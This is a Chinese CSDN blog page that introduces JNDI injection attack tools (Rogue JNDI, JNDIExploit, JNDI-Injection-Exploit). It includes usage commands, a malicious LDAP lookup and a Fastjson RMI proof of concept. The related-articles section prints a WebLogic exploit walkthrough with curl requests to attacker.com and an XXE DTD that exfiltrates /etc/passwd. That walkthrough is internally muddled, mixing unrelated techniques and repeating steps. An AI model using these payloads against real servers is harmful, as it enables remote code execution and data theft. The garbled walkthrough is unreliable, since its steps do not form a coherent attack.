JNDI注入辅助工具

最新推荐文章于 2024-05-26 09:50:48 发布
最新推荐文章于 2024-05-26 09:50:48 发布
阅读量9.9k 收藏 13
点赞数 1
分类专栏: 每天进步一点点 文章标签: jndi http ldap
本文链接:https://blog.csdn.net/dreamerrrrrr/article/details/113108414
版权

本文介绍三种JNDI注入辅助工具(偷懒工具)

一、Rogue JNDI

简介

用于JNDI注入攻击的恶意LDAP服务器。

项目地址https://github.com/veracode-research/rogue-jndi

该项目包含LDAP和HTTP服务器,用于利用默认情况下不安全的Java JNDI API。 为了进行攻击,您可以在本地启动这些服务器,然后在易受攻击的客户端上触发JNDI解析,例如:

InitialContext.doLookup("ldap://your_server.com:1389/o=reference");

它将启动从易受攻击的客户端到本地LDAP服务器的连接。然后,本地服务器使用包含有效载荷之一的恶意条目进行响应,这对于实现远程代码执行很有用。

除了已知的JNDI攻击方法(通过引用中的远程类加载)之外,此工具还利用ObjectFactories的功能带来了新的攻击媒介。

(注:该工具需要自行编译)

二、JNDIExploit

项目地址https://github.com/feihong-cs/JNDIExploit/tree/v.1.11

简介

一款用于 JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。

使用

使用 java -jar JNDIExploit.jar -h 查看参数说明,其中 --ip 参数为必选参数

Usage: java -jar JNDIExploit.jar [options]
  Options:
  * -i, --ip       Local ip address
    -l, --ldapPort Ldap bind port (default: 1389)
    -p, --httpPort Http bind port (default: 8080)
    -u, --usage    Show usage (default: false)
    -h, --help     Show this help

例子:

java -jar JNDIExploit-v1.11.jar -i 192.168.1.72

如下,执行后自动启动LDAP服务和HTTP服务

root@dream2:/root/JNDIExploit # java -jar JNDIExploit-v1.11.jar -i 192.168.1.72
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8080...

三、JNDI-Injection-Exploit

项目地址https://github.com/welk1n/JNDI-Injection-Exploit

简介

JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器提供后台服务的工具。 RMI服务器和LDAP服务器基于marshals,并进行了进一步修改以与HTTP服务器链接。

JNDI注入利用工具,生成JNDI链接并启动后端相关服务,可用于Fastjson、Jackson等相关漏洞的验证。

使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。

实例

如下是一个Fastjson vul-poc:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}
安服仔
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
JNDI漏洞利用 一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用java -jar JNDIExploit.jar -h查看参数说明,其中--ip参数为必选参数 Usage: java -jar JNDIExploit.jar [options] Options: * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false)
记一次攻防演练打点过程
2301_80127209的博客
10-23 479
本文章或工具仅供安全研究使用,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,极致攻防实验室及文章作者不为此承担任何责任。其次对URL进行指纹识别,虽然发现了几个存在指纹的系统,但后续渗透发现漏洞已无法利用,漏洞已修。在如今错综复杂的网络环境,还有各种防护设备的加持,漏洞利用可谓难上加难。当然不仅仅只是app.js中会存在。发送ldap请求,请求tomcatBypass路由,IP是VPS的IP,PORT是msf监听的端口。
红队专题-注入攻击-Tools-JNDIExploit
aming小老弟
12-27 601
【代码】红队专题-注入攻击-Tools-JNDIExploit
推荐开源项目:JNDI-Exploit-Bypass-Demo —— 深入理解与绕过JNDI操纵限制的实战示例...
最新发布
gitblog_00017的博客
05-26 373
推荐开源项目:JNDI-Exploit-Bypass-Demo —— 深入理解与绕过JNDI操纵限制的实战示例 项目地址:https://gitcode.com/kxcode/JNDI-Exploit-Bypass-Demo 在Java世界中,JNDI(Java Naming and Directory Interface)是一种强大的工具,用于查找和绑定分布式环境中的对象。然而,不恰当的使用可能...
用marshalsec & Jndi注入利用工具(JNDI-Injection-Exploit)复现Fastjson反序列化漏洞--保姆级!复现过程!
2301_79837041的博客
04-11 1801
安装maven环境后,更新完环境变量,但是每次使用mvn命令必须在source之后才能使用,我用的是kali,网上文章说在~./bash里面更新source /etc/profile 我试过了,没有用,最后是换在ubuntu系统里面安装才成功的,目前还不知道为什么,有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击,我们给指定类中的值输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞。
JNDIExploit使用方法
qq_50854662的博客
02-28 3505
JNDIExploit使用方法
weblogic 各种漏洞复现
Shanfenglan's blog
11-04 1106
文章目录1. cve-2021-2109 RCE1.1 原理1.2 利用1. 先用JNDIExploit启一个监听2. 抓包 1. cve-2021-2109 RCE 需要登录控制台或者配合 CVE-2020-14882 未授权访问漏洞即可实现rce。 影响版本: WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLogic 12.2.1.4.0 WebLogic 14.1.1.0.0 1.1 原理 大致就是bindingHandl
探索JNDIExploit:揭秘Java Naming and Directory Interface (JNDI) 攻击工具
gitblog_00045的博客
03-26 423
探索JNDIExploit:揭秘Java Naming and Directory Interface (JNDI) 攻击工具 项目地址:https://gitcode.com/WhiteHSBG/JNDIExploit 项目简介 JNDIExploit 是一个开源项目,旨在帮助安全研究人员和开发者理解、检测与防御JNDI注入攻击。该项目提供了一系列实用工具,让你能够在可控环境中模拟这类攻击,从而...
log4j命令注入漏洞复现
weixin_42891146的博客
12-11 7023
漏洞描述 Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。Spring-Boot-strater-log4j2、Apache Struts2、Apache Solr、Apache Flink、Apache Druid、ElasticSearch、Flume、Dubbo、Redis、Logstash、Kafka均受影响。 影响范围: Apache Log4j 2.x < 2.15.0-rc2 漏洞复现: 使用Log4j2漏洞环境进行...
如何配置SSM框架[参照].pdf
10-13
1. **Spring-Core.jar**: 包含Spring框架的基本核心工具类,是其他组件的基础。 2. **Spring-Beans.jar**: 提供了访问配置文件、创建和管理Bean以及Inversion of Control (IoC)和Dependency Injection (DI)操作的...
Java学习路线图,专为新手定制的Java学习计划建议[借鉴].pdf
10-19
学习者还应了解JAVAMAIL、JAF(Java Activation Framework)、Log4j等辅助开发工具,以及Junit进行单元测试。模板引擎如FreeMarker和Velocity可以帮助构建动态网页,Flex用于与Flash交互,Web Services和SOA(面向...
JNDIExploit-1.2-SNAPSHOT
03-20
JNDIExploit-1.2-SNAPSHOT
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,支持更多更强大的功能,并加入了多种方式进行回显的支持。 QAQ 功能 本工具支持了利用JNDI注入构造多种恶意负载,其中包括: 名称 功能 简介 基本信息 获取服务器基础信息 打印出System.getProperties()中的信息 命令 命令执行 反射调用forkandexec执行命令 数据源黑客 获取Spring DataSource明文 获取缓存在某些中的数据源 目录列表 目录遍历 使用File对象列目录 FileDelete 文件删除 使用File对象删除文件 文件读取 文件读取 使用FileInputStream读取文件 文件写入 文件写入 使用
JNDIExploit.zip
12-14
JNDIExploit
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
毕业设计外文翻译(计算机专业)-Spring框架.pdf
10-27
7. **工具模块**:Spring提供了各种工具类和辅助类,如类型转换、属性文件解析等,帮助开发者简化开发工作。 Spring的这些模块共同构成了一个强大的、灵活的开发框架,它促进了松耦合、可测试性和模块化的应用程序...
Spring2.5jar所有开发包及完整文档及项开发实例.pdf
10-11
`spring-mock.jar`主要用于开发环境中的辅助测试,正式部署时不使用。 1. `spring-core.jar`:这是Spring框架的基础,包含核心工具类,这些类被其他所有组件使用。它们是IoC(控制反转)和DI(依赖注入)的基础。 ...
新手如何学习java(java学习建议路线图).doc
09-18
在掌握了J2EE的基础后,可以进一步学习更高级的技术,如EJB、JMS、JNDI、JTA等,并接触分布式应用开发、Web服务和SOA(面向服务架构)等概念。 数据库技术是任何Java开发者的必备技能,需要熟悉至少一种关系型...
weblogic jndi注入漏洞利用
12-11
WebLogic 的/console/consolejndi.portal接口可以调用存在 JNDI 注入漏洞的com.bea.console.handles.JndiBindingHandle类,从而造成 RCE。攻击者可以通过构造恶意请求,将攻击者控制的 JNDI 对象绑定到 WebLogic JNDI 树上,从而实现远程代码执行。具体步骤如下: 1. 构造恶意请求,将攻击者控制的 JNDI 对象绑定到 WebLogic JNDI 树上。例如,可以使用以下命令将一个恶意的 LDAP URL 绑定到 WebLogic JNDI 树上: ``` curl -v -X POST -H 'Content-Type: application/json' -d '{"name": "ldap://attacker.com:1389/Exploit", "targets": [{"identity": {"type": "Server", "name": "AdminServer"}}]}' http://<WebLogic_IP>:<WebLogic_Port>/console/consolejndi.portal ``` 2. 构造恶意请求,触发 JNDI 注入漏洞。例如,可以使用以下命令触发漏洞: ``` curl -v -X POST -H 'Content-Type: application/json' -d '{"name": "Exploit", "bindings": [{"name": "Exploit", "type": "javax.naming.Reference", "value": {"className": "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext", "factoryClassName": "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext", "factoryMethodName": "setConfigLocation", "factoryMethodArgs": ["http://attacker.com/evil.xml"]}}]}' http://<WebLogic_IP>:<WebLogic_Port>/console/consolejndi.portal ``` 3. 在攻击者控制的服务器上,启动一个 HTTP 服务器,将恶意的 XML 文件放到该服务器上。例如,可以使用以下命令启动一个 Python HTTP 服务器: ``` python -m SimpleHTTPServer 80 ``` 4. 构造恶意的 XML 文件,该文件将在 WebLogic 服务器上执行恶意代码。例如,可以使用以下 XML 文件: ``` <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]> ``` 5. 在攻击者控制的服务器上,启动一个 HTTP 服务器,将恶意的 DTD 文件放到该服务器上。例如,可以使用以下命令启动一个 Python HTTP 服务器: ``` python -m SimpleHTTPServer 80 ``` 6. 构造恶意的 DTD 文件,该文件将在 WebLogic 服务器上执行恶意代码。例如,可以使用以下 DTD 文件: ``` <!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % remote "<!ENTITY % send SYSTEM 'http://attacker.com/?%payload;'>"> %remote; ``` 7. 等待 WebLogic 服务器向攻击者控制的服务器发送 HTTP 请求,从而触发恶意代码的执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值